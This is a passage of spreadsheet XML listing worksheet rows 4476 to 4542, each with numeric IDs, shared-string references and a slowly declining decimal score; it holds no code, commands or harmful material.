    <row r="4476" ht="15.75" customHeight="1">
      <c r="A4476" s="1">
        <v>7049.0</v>
      </c>
      <c r="B4476" s="2">
        <v>5.0183333E7</v>
      </c>
      <c r="C4476" s="2" t="s">
        <v>4262</v>
      </c>
      <c r="D4476" s="2">
        <v>1.0</v>
      </c>
      <c r="E4476" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4476" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="4477" ht="15.75" customHeight="1">
      <c r="A4477" s="1">
        <v>8071.0</v>
      </c>
      <c r="B4477" s="2">
        <v>5.2976005E7</v>
      </c>
      <c r="C4477" s="2" t="s">
        <v>4263</v>
      </c>
      <c r="D4477" s="2">
        <v>1.0</v>
      </c>
      <c r="E4477" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4477" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="4478" ht="15.75" customHeight="1">
      <c r="A4478" s="1">
        <v>9252.0</v>
      </c>
      <c r="B4478" s="2">
        <v>5.5476671E7</v>
      </c>
      <c r="C4478" s="2" t="s">
        <v>4264</v>
      </c>
      <c r="D4478" s="2">
        <v>1.0</v>
      </c>
      <c r="E4478" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4478" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="4479" ht="15.75" customHeight="1">
      <c r="A4479" s="1">
        <v>11757.0</v>
      </c>
      <c r="B4479" s="2">
        <v>2.4127273E7</v>
      </c>
      <c r="C4479" s="2" t="s">
        <v>4265</v>
      </c>
      <c r="D4479" s="2">
        <v>1.0</v>
      </c>
      <c r="E4479" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4479" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="4480" ht="15.75" customHeight="1">
      <c r="A4480" s="1">
        <v>12388.0</v>
      </c>
      <c r="B4480" s="2">
        <v>2.8866273E7</v>
      </c>
      <c r="C4480" s="2" t="s">
        <v>4266</v>
      </c>
      <c r="D4480" s="2">
        <v>1.0</v>
      </c>
      <c r="E4480" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4480" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="4481" ht="15.75" customHeight="1">
      <c r="A4481" s="1">
        <v>12617.0</v>
      </c>
      <c r="B4481" s="2">
        <v>3.0216236E7</v>
      </c>
      <c r="C4481" s="2" t="s">
        <v>4267</v>
      </c>
      <c r="D4481" s="2">
        <v>1.0</v>
      </c>
      <c r="E4481" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4481" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="4482" ht="15.75" customHeight="1">
      <c r="A4482" s="1">
        <v>14710.0</v>
      </c>
      <c r="B4482" s="2">
        <v>4.0623081E7</v>
      </c>
      <c r="C4482" s="2" t="s">
        <v>4268</v>
      </c>
      <c r="D4482" s="2">
        <v>1.0</v>
      </c>
      <c r="E4482" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4482" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="4483" ht="15.75" customHeight="1">
      <c r="A4483" s="1">
        <v>15399.0</v>
      </c>
      <c r="B4483" s="2">
        <v>4.2827754E7</v>
      </c>
      <c r="C4483" s="2" t="s">
        <v>4269</v>
      </c>
      <c r="D4483" s="2">
        <v>1.0</v>
      </c>
      <c r="E4483" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4483" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="4484" ht="15.75" customHeight="1">
      <c r="A4484" s="1">
        <v>18148.0</v>
      </c>
      <c r="B4484" s="2">
        <v>5.185563E7</v>
      </c>
      <c r="C4484" s="2" t="s">
        <v>4270</v>
      </c>
      <c r="D4484" s="2">
        <v>1.0</v>
      </c>
      <c r="E4484" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4484" s="2">
        <v>0.1059670781893004</v>
      </c>
    </row>
    <row r="4485" ht="15.75" customHeight="1">
      <c r="A4485" s="1">
        <v>3710.0</v>
      </c>
      <c r="B4485" s="2">
        <v>3.9599477E7</v>
      </c>
      <c r="C4485" s="2" t="s">
        <v>4271</v>
      </c>
      <c r="D4485" s="2">
        <v>1.0</v>
      </c>
      <c r="E4485" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4485" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="4486" ht="15.75" customHeight="1">
      <c r="A4486" s="1">
        <v>3771.0</v>
      </c>
      <c r="B4486" s="2">
        <v>3.9828853E7</v>
      </c>
      <c r="C4486" s="2" t="s">
        <v>4272</v>
      </c>
      <c r="D4486" s="2">
        <v>1.0</v>
      </c>
      <c r="E4486" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4486" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="4487" ht="15.75" customHeight="1">
      <c r="A4487" s="1">
        <v>3790.0</v>
      </c>
      <c r="B4487" s="2">
        <v>3.9952885E7</v>
      </c>
      <c r="C4487" s="2" t="s">
        <v>4273</v>
      </c>
      <c r="D4487" s="2">
        <v>1.0</v>
      </c>
      <c r="E4487" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4487" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="4488" ht="15.75" customHeight="1">
      <c r="A4488" s="1">
        <v>4171.0</v>
      </c>
      <c r="B4488" s="2">
        <v>4.1552502E7</v>
      </c>
      <c r="C4488" s="2" t="s">
        <v>4274</v>
      </c>
      <c r="D4488" s="2">
        <v>1.0</v>
      </c>
      <c r="E4488" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4488" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="4489" ht="15.75" customHeight="1">
      <c r="A4489" s="1">
        <v>5558.0</v>
      </c>
      <c r="B4489" s="2">
        <v>4.5978301E7</v>
      </c>
      <c r="C4489" s="2" t="s">
        <v>4275</v>
      </c>
      <c r="D4489" s="2">
        <v>1.0</v>
      </c>
      <c r="E4489" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4489" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="4490" ht="15.75" customHeight="1">
      <c r="A4490" s="1">
        <v>7721.0</v>
      </c>
      <c r="B4490" s="2">
        <v>5.2020976E7</v>
      </c>
      <c r="C4490" s="2" t="s">
        <v>4276</v>
      </c>
      <c r="D4490" s="2">
        <v>1.0</v>
      </c>
      <c r="E4490" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4490" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="4491" ht="15.75" customHeight="1">
      <c r="A4491" s="1">
        <v>8272.0</v>
      </c>
      <c r="B4491" s="2">
        <v>5.3453113E7</v>
      </c>
      <c r="C4491" s="2" t="s">
        <v>4277</v>
      </c>
      <c r="D4491" s="2">
        <v>1.0</v>
      </c>
      <c r="E4491" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4491" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="4492" ht="15.75" customHeight="1">
      <c r="A4492" s="1">
        <v>12283.0</v>
      </c>
      <c r="B4492" s="2">
        <v>2.817269E7</v>
      </c>
      <c r="C4492" s="2" t="s">
        <v>4278</v>
      </c>
      <c r="D4492" s="2">
        <v>1.0</v>
      </c>
      <c r="E4492" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4492" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="4493" ht="15.75" customHeight="1">
      <c r="A4493" s="1">
        <v>14158.0</v>
      </c>
      <c r="B4493" s="2">
        <v>3.8009796E7</v>
      </c>
      <c r="C4493" s="2" t="s">
        <v>4279</v>
      </c>
      <c r="D4493" s="2">
        <v>1.0</v>
      </c>
      <c r="E4493" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4493" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="4494" ht="15.75" customHeight="1">
      <c r="A4494" s="1">
        <v>14922.0</v>
      </c>
      <c r="B4494" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C4494" s="2" t="s">
        <v>4280</v>
      </c>
      <c r="D4494" s="2">
        <v>1.0</v>
      </c>
      <c r="E4494" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4494" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="4495" ht="15.75" customHeight="1">
      <c r="A4495" s="1">
        <v>19930.0</v>
      </c>
      <c r="B4495" s="2">
        <v>5.7434773E7</v>
      </c>
      <c r="C4495" s="2" t="s">
        <v>4281</v>
      </c>
      <c r="D4495" s="2">
        <v>1.0</v>
      </c>
      <c r="E4495" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4495" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="4496" ht="15.75" customHeight="1">
      <c r="A4496" s="1">
        <v>31017.0</v>
      </c>
      <c r="B4496" s="2">
        <v>4.7733848E7</v>
      </c>
      <c r="C4496" s="2" t="s">
        <v>4282</v>
      </c>
      <c r="D4496" s="2">
        <v>1.0</v>
      </c>
      <c r="E4496" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4496" s="2">
        <v>0.1058700209643606</v>
      </c>
    </row>
    <row r="4497" ht="15.75" customHeight="1">
      <c r="A4497" s="1">
        <v>3916.0</v>
      </c>
      <c r="B4497" s="2">
        <v>4.0545421E7</v>
      </c>
      <c r="C4497" s="2" t="s">
        <v>4283</v>
      </c>
      <c r="D4497" s="2">
        <v>1.0</v>
      </c>
      <c r="E4497" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4497" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="4498" ht="15.75" customHeight="1">
      <c r="A4498" s="1">
        <v>9710.0</v>
      </c>
      <c r="B4498" s="2">
        <v>5.6384894E7</v>
      </c>
      <c r="C4498" s="2" t="s">
        <v>4284</v>
      </c>
      <c r="D4498" s="2">
        <v>1.0</v>
      </c>
      <c r="E4498" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4498" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="4499" ht="15.75" customHeight="1">
      <c r="A4499" s="1">
        <v>16476.0</v>
      </c>
      <c r="B4499" s="2">
        <v>4.6509555E7</v>
      </c>
      <c r="C4499" s="2" t="s">
        <v>4285</v>
      </c>
      <c r="D4499" s="2">
        <v>1.0</v>
      </c>
      <c r="E4499" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4499" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="4500" ht="15.75" customHeight="1">
      <c r="A4500" s="1">
        <v>19832.0</v>
      </c>
      <c r="B4500" s="2">
        <v>5.7050948E7</v>
      </c>
      <c r="C4500" s="2" t="s">
        <v>4286</v>
      </c>
      <c r="D4500" s="2">
        <v>1.0</v>
      </c>
      <c r="E4500" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4500" s="2">
        <v>0.1057692307692307</v>
      </c>
    </row>
    <row r="4501" ht="15.75" customHeight="1">
      <c r="A4501" s="1">
        <v>9874.0</v>
      </c>
      <c r="B4501" s="2">
        <v>5.6738812E7</v>
      </c>
      <c r="C4501" s="2" t="s">
        <v>4287</v>
      </c>
      <c r="D4501" s="2">
        <v>1.0</v>
      </c>
      <c r="E4501" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4501" s="2">
        <v>0.1053921568627451</v>
      </c>
    </row>
    <row r="4502" ht="15.75" customHeight="1">
      <c r="A4502" s="1">
        <v>1548.0</v>
      </c>
      <c r="B4502" s="2">
        <v>2.75731E7</v>
      </c>
      <c r="C4502" s="2" t="s">
        <v>4288</v>
      </c>
      <c r="D4502" s="2">
        <v>1.0</v>
      </c>
      <c r="E4502" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4502" s="2">
        <v>0.1052188552188552</v>
      </c>
    </row>
    <row r="4503" ht="15.75" customHeight="1">
      <c r="A4503" s="1">
        <v>8091.0</v>
      </c>
      <c r="B4503" s="2">
        <v>5.3049085E7</v>
      </c>
      <c r="C4503" s="2" t="s">
        <v>4289</v>
      </c>
      <c r="D4503" s="2">
        <v>1.0</v>
      </c>
      <c r="E4503" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4503" s="2">
        <v>0.104735883424408</v>
      </c>
    </row>
    <row r="4504" ht="15.75" customHeight="1">
      <c r="A4504" s="1">
        <v>1554.0</v>
      </c>
      <c r="B4504" s="2">
        <v>2.7650622E7</v>
      </c>
      <c r="C4504" s="2" t="s">
        <v>4290</v>
      </c>
      <c r="D4504" s="2">
        <v>1.0</v>
      </c>
      <c r="E4504" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4504" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="4505" ht="15.75" customHeight="1">
      <c r="A4505" s="1">
        <v>9227.0</v>
      </c>
      <c r="B4505" s="2">
        <v>5.5443069E7</v>
      </c>
      <c r="C4505" s="2" t="s">
        <v>4291</v>
      </c>
      <c r="D4505" s="2">
        <v>1.0</v>
      </c>
      <c r="E4505" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4505" s="2">
        <v>0.1046296296296296</v>
      </c>
    </row>
    <row r="4506" ht="15.75" customHeight="1">
      <c r="A4506" s="1">
        <v>1448.0</v>
      </c>
      <c r="B4506" s="2">
        <v>2.6825804E7</v>
      </c>
      <c r="C4506" s="2" t="s">
        <v>4292</v>
      </c>
      <c r="D4506" s="2">
        <v>1.0</v>
      </c>
      <c r="E4506" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4506" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4507" ht="15.75" customHeight="1">
      <c r="A4507" s="1">
        <v>3494.0</v>
      </c>
      <c r="B4507" s="2">
        <v>3.8467156E7</v>
      </c>
      <c r="C4507" s="2" t="s">
        <v>4293</v>
      </c>
      <c r="D4507" s="2">
        <v>1.0</v>
      </c>
      <c r="E4507" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4507" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4508" ht="15.75" customHeight="1">
      <c r="A4508" s="1">
        <v>4060.0</v>
      </c>
      <c r="B4508" s="2">
        <v>4.1132474E7</v>
      </c>
      <c r="C4508" s="2" t="s">
        <v>4294</v>
      </c>
      <c r="D4508" s="2">
        <v>1.0</v>
      </c>
      <c r="E4508" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4508" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4509" ht="15.75" customHeight="1">
      <c r="A4509" s="1">
        <v>7922.0</v>
      </c>
      <c r="B4509" s="2">
        <v>5.2561206E7</v>
      </c>
      <c r="C4509" s="2" t="s">
        <v>4295</v>
      </c>
      <c r="D4509" s="2">
        <v>1.0</v>
      </c>
      <c r="E4509" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4509" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4510" ht="15.75" customHeight="1">
      <c r="A4510" s="1">
        <v>9161.0</v>
      </c>
      <c r="B4510" s="2">
        <v>5.5304213E7</v>
      </c>
      <c r="C4510" s="2" t="s">
        <v>4296</v>
      </c>
      <c r="D4510" s="2">
        <v>1.0</v>
      </c>
      <c r="E4510" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4510" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4511" ht="15.75" customHeight="1">
      <c r="A4511" s="1">
        <v>11162.0</v>
      </c>
      <c r="B4511" s="2">
        <v>195331.0</v>
      </c>
      <c r="C4511" s="2" t="s">
        <v>4297</v>
      </c>
      <c r="D4511" s="2">
        <v>1.0</v>
      </c>
      <c r="E4511" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4511" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4512" ht="15.75" customHeight="1">
      <c r="A4512" s="1">
        <v>11798.0</v>
      </c>
      <c r="B4512" s="2">
        <v>2.4377364E7</v>
      </c>
      <c r="C4512" s="2" t="s">
        <v>4298</v>
      </c>
      <c r="D4512" s="2">
        <v>1.0</v>
      </c>
      <c r="E4512" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4512" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4513" ht="15.75" customHeight="1">
      <c r="A4513" s="1">
        <v>11817.0</v>
      </c>
      <c r="B4513" s="2">
        <v>2.456647E7</v>
      </c>
      <c r="C4513" s="2" t="s">
        <v>4299</v>
      </c>
      <c r="D4513" s="2">
        <v>1.0</v>
      </c>
      <c r="E4513" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4513" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4514" ht="15.75" customHeight="1">
      <c r="A4514" s="1">
        <v>12666.0</v>
      </c>
      <c r="B4514" s="2">
        <v>3.0558965E7</v>
      </c>
      <c r="C4514" s="2" t="s">
        <v>4300</v>
      </c>
      <c r="D4514" s="2">
        <v>1.0</v>
      </c>
      <c r="E4514" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4514" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4515" ht="15.75" customHeight="1">
      <c r="A4515" s="1">
        <v>17816.0</v>
      </c>
      <c r="B4515" s="2">
        <v>5.0901846E7</v>
      </c>
      <c r="C4515" s="2" t="s">
        <v>4301</v>
      </c>
      <c r="D4515" s="2">
        <v>1.0</v>
      </c>
      <c r="E4515" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4515" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4516" ht="15.75" customHeight="1">
      <c r="A4516" s="1">
        <v>21382.0</v>
      </c>
      <c r="B4516" s="2">
        <v>2.1681192E7</v>
      </c>
      <c r="C4516" s="2" t="s">
        <v>4302</v>
      </c>
      <c r="D4516" s="2">
        <v>1.0</v>
      </c>
      <c r="E4516" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4516" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4517" ht="15.75" customHeight="1">
      <c r="A4517" s="1">
        <v>24551.0</v>
      </c>
      <c r="B4517" s="2">
        <v>1.1273848E7</v>
      </c>
      <c r="C4517" s="2" t="s">
        <v>4303</v>
      </c>
      <c r="D4517" s="2">
        <v>1.0</v>
      </c>
      <c r="E4517" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4517" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4518" ht="15.75" customHeight="1">
      <c r="A4518" s="1">
        <v>28688.0</v>
      </c>
      <c r="B4518" s="2">
        <v>2.7619143E7</v>
      </c>
      <c r="C4518" s="2" t="s">
        <v>4304</v>
      </c>
      <c r="D4518" s="2">
        <v>1.0</v>
      </c>
      <c r="E4518" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4518" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4519" ht="15.75" customHeight="1">
      <c r="A4519" s="1">
        <v>33112.0</v>
      </c>
      <c r="B4519" s="2">
        <v>6959208.0</v>
      </c>
      <c r="C4519" s="2" t="s">
        <v>4305</v>
      </c>
      <c r="D4519" s="2">
        <v>1.0</v>
      </c>
      <c r="E4519" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4519" s="2">
        <v>0.1045197740112994</v>
      </c>
    </row>
    <row r="4520" ht="15.75" customHeight="1">
      <c r="A4520" s="1">
        <v>8739.0</v>
      </c>
      <c r="B4520" s="2">
        <v>5.4529441E7</v>
      </c>
      <c r="C4520" s="2" t="s">
        <v>4306</v>
      </c>
      <c r="D4520" s="2">
        <v>1.0</v>
      </c>
      <c r="E4520" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4520" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="4521" ht="15.75" customHeight="1">
      <c r="A4521" s="1">
        <v>13197.0</v>
      </c>
      <c r="B4521" s="2">
        <v>3.4102811E7</v>
      </c>
      <c r="C4521" s="2" t="s">
        <v>4307</v>
      </c>
      <c r="D4521" s="2">
        <v>1.0</v>
      </c>
      <c r="E4521" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4521" s="2">
        <v>0.1044061302681992</v>
      </c>
    </row>
    <row r="4522" ht="15.75" customHeight="1">
      <c r="A4522" s="1">
        <v>6285.0</v>
      </c>
      <c r="B4522" s="2">
        <v>4.8162015E7</v>
      </c>
      <c r="C4522" s="2" t="s">
        <v>4308</v>
      </c>
      <c r="D4522" s="2">
        <v>1.0</v>
      </c>
      <c r="E4522" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4522" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="4523" ht="15.75" customHeight="1">
      <c r="A4523" s="1">
        <v>9594.0</v>
      </c>
      <c r="B4523" s="2">
        <v>5.6113994E7</v>
      </c>
      <c r="C4523" s="2" t="s">
        <v>4309</v>
      </c>
      <c r="D4523" s="2">
        <v>1.0</v>
      </c>
      <c r="E4523" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4523" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="4524" ht="15.75" customHeight="1">
      <c r="A4524" s="1">
        <v>346.0</v>
      </c>
      <c r="B4524" s="2">
        <v>1.5963616E7</v>
      </c>
      <c r="C4524" s="2" t="s">
        <v>4310</v>
      </c>
      <c r="D4524" s="2">
        <v>1.0</v>
      </c>
      <c r="E4524" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4524" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="4525" ht="15.75" customHeight="1">
      <c r="A4525" s="1">
        <v>1400.0</v>
      </c>
      <c r="B4525" s="2">
        <v>2.6294738E7</v>
      </c>
      <c r="C4525" s="2" t="s">
        <v>4311</v>
      </c>
      <c r="D4525" s="2">
        <v>1.0</v>
      </c>
      <c r="E4525" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4525" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="4526" ht="15.75" customHeight="1">
      <c r="A4526" s="1">
        <v>2382.0</v>
      </c>
      <c r="B4526" s="2">
        <v>3.3323038E7</v>
      </c>
      <c r="C4526" s="2" t="s">
        <v>4312</v>
      </c>
      <c r="D4526" s="2">
        <v>1.0</v>
      </c>
      <c r="E4526" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4526" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="4527" ht="15.75" customHeight="1">
      <c r="A4527" s="1">
        <v>5221.0</v>
      </c>
      <c r="B4527" s="2">
        <v>4.4967826E7</v>
      </c>
      <c r="C4527" s="2" t="s">
        <v>4313</v>
      </c>
      <c r="D4527" s="2">
        <v>1.0</v>
      </c>
      <c r="E4527" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4527" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="4528" ht="15.75" customHeight="1">
      <c r="A4528" s="1">
        <v>6361.0</v>
      </c>
      <c r="B4528" s="2">
        <v>4.834795E7</v>
      </c>
      <c r="C4528" s="2" t="s">
        <v>4314</v>
      </c>
      <c r="D4528" s="2">
        <v>1.0</v>
      </c>
      <c r="E4528" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4528" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="4529" ht="15.75" customHeight="1">
      <c r="A4529" s="1">
        <v>7403.0</v>
      </c>
      <c r="B4529" s="2">
        <v>5.1104232E7</v>
      </c>
      <c r="C4529" s="2" t="s">
        <v>4315</v>
      </c>
      <c r="D4529" s="2">
        <v>1.0</v>
      </c>
      <c r="E4529" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4529" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="4530" ht="15.75" customHeight="1">
      <c r="A4530" s="1">
        <v>12369.0</v>
      </c>
      <c r="B4530" s="2">
        <v>2.8814296E7</v>
      </c>
      <c r="C4530" s="2" t="s">
        <v>4316</v>
      </c>
      <c r="D4530" s="2">
        <v>1.0</v>
      </c>
      <c r="E4530" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4530" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="4531" ht="15.75" customHeight="1">
      <c r="A4531" s="1">
        <v>13332.0</v>
      </c>
      <c r="B4531" s="2">
        <v>3.4641539E7</v>
      </c>
      <c r="C4531" s="2" t="s">
        <v>4317</v>
      </c>
      <c r="D4531" s="2">
        <v>1.0</v>
      </c>
      <c r="E4531" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4531" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="4532" ht="15.75" customHeight="1">
      <c r="A4532" s="1">
        <v>32435.0</v>
      </c>
      <c r="B4532" s="2">
        <v>5655084.0</v>
      </c>
      <c r="C4532" s="2" t="s">
        <v>4318</v>
      </c>
      <c r="D4532" s="2">
        <v>1.0</v>
      </c>
      <c r="E4532" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4532" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="4533" ht="15.75" customHeight="1">
      <c r="A4533" s="1">
        <v>12087.0</v>
      </c>
      <c r="B4533" s="2">
        <v>2.6706477E7</v>
      </c>
      <c r="C4533" s="2" t="s">
        <v>4319</v>
      </c>
      <c r="D4533" s="2">
        <v>1.0</v>
      </c>
      <c r="E4533" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4533" s="2">
        <v>0.1041666666666666</v>
      </c>
    </row>
    <row r="4534" ht="15.75" customHeight="1">
      <c r="A4534" s="1">
        <v>497.0</v>
      </c>
      <c r="B4534" s="2">
        <v>1.7789947E7</v>
      </c>
      <c r="C4534" s="2" t="s">
        <v>4320</v>
      </c>
      <c r="D4534" s="2">
        <v>1.0</v>
      </c>
      <c r="E4534" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4534" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="4535" ht="15.75" customHeight="1">
      <c r="A4535" s="1">
        <v>2704.0</v>
      </c>
      <c r="B4535" s="2">
        <v>3.4857431E7</v>
      </c>
      <c r="C4535" s="2" t="s">
        <v>4321</v>
      </c>
      <c r="D4535" s="2">
        <v>1.0</v>
      </c>
      <c r="E4535" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4535" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="4536" ht="15.75" customHeight="1">
      <c r="A4536" s="1">
        <v>3248.0</v>
      </c>
      <c r="B4536" s="2">
        <v>3.7384223E7</v>
      </c>
      <c r="C4536" s="2" t="s">
        <v>4322</v>
      </c>
      <c r="D4536" s="2">
        <v>1.0</v>
      </c>
      <c r="E4536" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4536" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="4537" ht="15.75" customHeight="1">
      <c r="A4537" s="1">
        <v>4818.0</v>
      </c>
      <c r="B4537" s="2">
        <v>4.3604062E7</v>
      </c>
      <c r="C4537" s="2" t="s">
        <v>4323</v>
      </c>
      <c r="D4537" s="2">
        <v>1.0</v>
      </c>
      <c r="E4537" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4537" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="4538" ht="15.75" customHeight="1">
      <c r="A4538" s="1">
        <v>5598.0</v>
      </c>
      <c r="B4538" s="2">
        <v>4.6136334E7</v>
      </c>
      <c r="C4538" s="2" t="s">
        <v>4324</v>
      </c>
      <c r="D4538" s="2">
        <v>1.0</v>
      </c>
      <c r="E4538" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4538" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="4539" ht="15.75" customHeight="1">
      <c r="A4539" s="1">
        <v>8120.0</v>
      </c>
      <c r="B4539" s="2">
        <v>5.3080065E7</v>
      </c>
      <c r="C4539" s="2" t="s">
        <v>4325</v>
      </c>
      <c r="D4539" s="2">
        <v>1.0</v>
      </c>
      <c r="E4539" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4539" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="4540" ht="15.75" customHeight="1">
      <c r="A4540" s="1">
        <v>10730.0</v>
      </c>
      <c r="B4540" s="2">
        <v>1.5256033E7</v>
      </c>
      <c r="C4540" s="2" t="s">
        <v>4326</v>
      </c>
      <c r="D4540" s="2">
        <v>1.0</v>
      </c>
      <c r="E4540" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4540" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="4541" ht="15.75" customHeight="1">
      <c r="A4541" s="1">
        <v>12146.0</v>
      </c>
      <c r="B4541" s="2">
        <v>2.7158319E7</v>
      </c>
      <c r="C4541" s="2" t="s">
        <v>4327</v>
      </c>
      <c r="D4541" s="2">
        <v>1.0</v>
      </c>
      <c r="E4541" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4541" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="4542" ht="15.75" customHeight="1">
      <c r="A4542" s="1">
        <v>12678.0</v>
      </c>
      <c r="B4542" s="2">
        <v>3.0625967E7</v>
      </c>
      <c r="C4542" s="2" t="s">
        <v>4328</v>
      </c>
      <c r="D4542" s="2">
        <v>1.0</v>
      </c>
      <c r="E4542" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F4542" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
